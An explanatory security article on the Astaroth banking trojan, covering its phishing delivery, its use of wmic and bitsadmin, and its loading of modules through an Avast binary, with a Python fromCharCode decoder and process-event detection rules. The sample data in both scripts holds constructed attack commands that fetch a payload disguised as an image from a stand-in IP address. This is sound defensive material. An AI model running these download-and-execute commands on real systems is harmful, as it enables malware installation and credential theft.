Astaroth is a dangerous banking trojan first documented in 2017. A new strain was recently caught spreading in South America (Brazil in particular) and Europe, abusing legitimate antivirus binaries to run its own code and stealing banking credentials. The new Astaroth trojan is something users everywhere should be aware of, because its improved obfuscation and its abuse of Avast, one of the most popular anti-malware products, can lead to emptied bank accounts, hijacked accounts, follow-on malware infections and data breaches.
Malware infections have increased significantly over the past year, not only because more samples are being released but because attackers keep finding new ways to misuse features of legitimate software and to improve their obfuscation. In this case the abused antivirus process is the reason Avast initially had trouble detecting the new Astaroth strain: the malicious module is loaded by aswrundll.exe, a legitimate Avast executable whose normal job is to load the product's own trusted DLL modules, so the trojan's activity looked like the antivirus's own. Avast addressed the issue and stated that its binaries have self-protection mechanisms and that the new Astaroth malware is now detected.
If you are running an older Avast version, or no anti-malware program at all, keep reading to find out more about the Astaroth trojan. Because it is so evasive, even antivirus products have had trouble detecting it, so knowing how it spreads and how it typically behaves lets you recognise the danger yourself and stop the infection from going further.
What is Astaroth trojan
Astaroth (a name borrowed from the 'Great Duke of Hell' of demonology) is malware that steals sensitive data by logging keystrokes, reading whatever is copied to the clipboard and delivering other malware, silently profiting from the user (or company) and its computer. Astaroth was first documented by Cofense; the new variant not only abuses trusted Windows processes to carry out its work but also co-opts security software binaries to run its own modules. In addition, this strain hides its script behind JavaScript's String.fromCharCode() encoding and decodes it only at run time, so the initial stage contains no readable strings and slips past signature-based detection.
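The fromCharCode trick is easy to undo once you have the script in hand: every String.fromCharCode(...) call is just a list of character codes. The decoder below is an added example written for this article, not code from the Astaroth sample or from any of the researchers cited. The JScript fragment it runs on is constructed to look like such a stage (the URL and paths are made up); the decoder rewrites each call as a string literal and repeats until nothing changes, so a decoded layer that itself contains fromCharCode calls (the usual eval-of-a-string trick) is peeled as well.

```python
import re

# Constructed sample in the style of a fromCharCode-obfuscated JScript stage.
# It is NOT the real Astaroth script; strings, URL and paths are made up.
SAMPLE_SCRIPT = r"""
var a = String.fromCharCode(87,83,99,114,105,112,116,46,83,104,101,108,108);
var b = String.fromCharCode(0x62,0x69,0x74,0x73,0x61,0x64,0x6d,0x69,0x6e);
var sh = new ActiveXObject(a);
sh.Run(b + " /transfer j http://203.0.113.10/a.jpeg C:\\Users\\Public\\r.jpeg");
"""

# Innermost calls only (no parentheses inside the argument list), so nested
# calls are peeled one layer per round.
_CALL = re.compile(r'String\.fromCharCode\s*\(([^()]*)\)', re.IGNORECASE)


def _parse_code(tok):
    """Parse one numeric argument: decimal or 0x-prefixed hex."""
    tok = tok.strip()
    if tok.lower().startswith('0x'):
        return int(tok, 16)
    return int(tok)


def _decode_args(arg_text):
    """Turn '87,83,...' into the string those UTF-16 code units spell."""
    codes = [_parse_code(t) for t in arg_text.split(',') if t.strip()]
    return ''.join(chr(c & 0xFFFF) for c in codes)


def decode_fromcharcode(script, max_rounds=10):
    """Replace every String.fromCharCode(...) call with a JS string literal.

    Repeats until nothing changes, so a decoded layer that itself contains
    fromCharCode calls is peeled too. Returns (rewritten_script, recovered_strings).
    Calls whose arguments are not plain numbers (variables, expressions) are left alone.
    """
    recovered = []

    def repl(m):
        try:
            s = _decode_args(m.group(1))
        except ValueError:
            return m.group(0)  # non-numeric args: leave the call untouched
        recovered.append(s)
        return '"' + s.replace('\\', '\\\\').replace('"', '\\"') + '"'

    for _ in range(max_rounds):
        new_script = _CALL.sub(repl, script)
        if new_script == script:
            break
        script = new_script
    return script, recovered


if __name__ == '__main__':
    cleaned, strings = decode_fromcharcode(SAMPLE_SCRIPT)
    print(cleaned)
    print('recovered:', strings)
```

Run it on a script pulled from a sample and grep the recovered strings for the usual suspects (WScript.Shell, bitsadmin, wmic, URLs); those are what the obfuscation was hiding from the scanner in the first place.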
Astaroth attacks rely on malicious binary modules and on abusing built-in Windows tools such as BITSAdmin and the WMIC utility (so-called LOLBins, living-off-the-land binaries) to talk to its C2 servers. As researchers at Cybereason.com reported, this lets Astaroth infect Windows, log keystrokes, hook OS calls and expose large amounts of the sensitive data the user types on the compromised machine when logging in to bank and business accounts. On top of that, bundled with the NetPass password-recovery tool, the trojan collects stored passwords for mail accounts, messengers, Internet Explorer and so on, including saved credentials for other machines on the same network.
Trojans such as CamuBot, JS.Downloader and vbs:malware-gen are known for this kind of behaviour, but security researchers expect the combination Astaroth introduced (LOLBins plus abuse of antivirus binaries) to be widely adopted by other attackers soon, which will make detection much harder. So while criminals work on obfuscation and on making their malware more damaging, make sure to brush up on your safe online browsing habits.
How does Astaroth virus spread
At the moment Astaroth is known to spread via phishing emails posing either as fake invoices or as a Brazilian presidential election research poll. The messages are carefully socially engineered to look like they come from respected institutions, which is why they fool so many users. The invoice email delivers Astaroth much as ransomware is distributed: a short message claims a payment is due and that you must open the attached zip file to see the details, and the archive actually contains the trojan's installer. The presidential poll version asks users to pick one of the Brazilian candidates (Haddad or Bolsonaro) and register their opinion by clicking a button, which leads to the malicious link. (More about the campaign on Cofense.com)
According to Bleepingcomputer.com, once the user clicks the link or opens the downloaded zip file, the .lnk file inside launches a wmic.exe process whose /format argument points at a remote XSL file, an XSL Script Processing attack: wmic.exe fetches the stylesheet from the C2 server and runs the script embedded in it. Astaroth connects to the attackers' server and sends it information about the compromised system; once the XSL script has run on the infected computer, the malware contacts a second command-and-control server and uses BITSAdmin to download a payload containing several Astaroth modules, disguised as .jpeg or .gif files or as files with no extension at all so they do not attract attention. The malicious modules are then loaded through aswrundll.exe, a legitimate Avast antivirus binary, or through the unins000.exe process of another security product, from GAS Tecnologia. Running under a trusted security process lets Astaroth stay undetected while it monitors the clipboard, logs keystrokes, loads additional modules, collects data about the machine and steals information.
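Every step of that chain, and the LOLBin use described two sections up, leaves a process-creation event that a defender can match on even when the payload itself is unknown. The rules below are an added example for this article (not detection content from Avast, Cybereason or Bleepingcomputer) run over constructed Sysmon-style events, including two benign ones the rules must not flag. They look for wmic.exe rendering a remote stylesheet, bitsadmin pulling an HTTP URL into an "image" or extension-less file, and the two AV loader binaries named above being handed a module from outside their own install directory. That last rule assumes the loader takes the module path as a command-line argument; the article does not say how the loaders are invoked, so treat that as an assumption to verify against your own telemetry.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (think Sysmon Event ID 1)."""
    parent: str
    image: str
    cmdline: str


# Constructed events modelled on the chain described above. None of this is
# real telemetry; 203.0.113.10 is a documentation address.
EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic os get /format:"http://203.0.113.10/v.xsl"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer j1 /priority foreground http://203.0.113.10/a.jpeg C:\Users\Public\r.jpeg"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Program Files\Avast Software\Avast\aswrundll.exe",
              r'"C:\Program Files\Avast Software\Avast\aswrundll.exe" C:\Users\Public\r.jpeg'),
    # Benign noise the rules must not flag:
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic computersystem get name"),
    ProcEvent(r"C:\Program Files\Avast Software\Avast\AvastSvc.exe",
              r"C:\Program Files\Avast Software\Avast\aswrundll.exe",
              r'"C:\Program Files\Avast Software\Avast\aswrundll.exe" "C:\Program Files\Avast Software\Avast\defs\x.dll"'),
]

AV_LOADERS = ("aswrundll.exe", "unins000.exe")   # the two loaders named in the article
IMAGE_EXTS = ("jpeg", "jpg", "gif", "png")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _argv(cmdline):
    """Split a Windows command line into quoted or bare tokens."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def rule_remote_xsl(ev):
    """wmic.exe told to render with a remote stylesheet (ATT&CK T1220)."""
    if _basename(ev.image) != "wmic.exe":
        return None
    if re.search(r'/format:\s*"?https?://', ev.cmdline, re.IGNORECASE):
        return "wmic.exe fetching a remote XSL via /format: (T1220 XSL Script Processing)"
    return None


def rule_bits_download(ev):
    """bitsadmin /transfer from an HTTP URL, especially into an 'image' or extension-less file."""
    if _basename(ev.image) != "bitsadmin.exe":
        return None
    m = re.search(r'/transfer\b.*?(https?://\S+)\s+(\S+)', ev.cmdline, re.IGNORECASE)
    if not m:
        return None
    dest = m.group(2).strip('"')
    name = _basename(dest)
    ext = name.rsplit(".", 1)[1] if "." in name else ""
    finding = "bitsadmin download %s -> %s" % (m.group(1), dest)
    if ext in IMAGE_EXTS or ext == "":
        finding += " (payload disguised as image / no extension)"
    return finding


def rule_av_loader_abuse(ev):
    """A trusted AV loader asked to load a module from outside its own install directory.

    Assumption (not from the article): the module path is passed as a command-line
    argument, so any path argument outside the loader's directory is suspect.
    """
    name = _basename(ev.image)
    if name not in AV_LOADERS:
        return None
    loader_dir = ev.image.rsplit("\\", 1)[0].lower()
    for arg in _argv(ev.cmdline)[1:]:
        if "\\" in arg and not arg.lower().startswith(loader_dir):
            return "%s loading module outside its install dir: %s" % (name, arg)
    return None


RULES = (rule_remote_xsl, rule_bits_download, rule_av_loader_abuse)


def detect(events):
    """Return [(event_index, finding)] for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            finding = rule(ev)
            if finding:
                hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, finding in detect(EVENTS):
        print(idx, finding)
```

On the constructed events only the three attack-chain entries fire; the plain `wmic computersystem get name` and the loader picking a module from its own directory stay quiet. In production the same three conditions translate directly into EDR or SIEM queries on process-creation telemetry, and the loader rule is the one to tune first, since a product update could legitimately invoke the loader with a path you did not expect.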
How to get rid of Astaroth trojan
Astaroth is heavily obfuscated and has no graphical user interface from which a victim could uninstall it, so there is no practical way to remove it other than using a dedicated anti-malware program such as Spyhunter or Malwarebytes. These products can detect and remove the trojan, and the automatic clean-up does not cost you hours of your time because the software does the work for you. If you cannot download security tools on the infected machine, download them on a clean computer and transfer them to the compromised one on a USB drive or similar. Because Astaroth steals credentials, change your banking and email passwords from a clean device once the machine has been cleaned.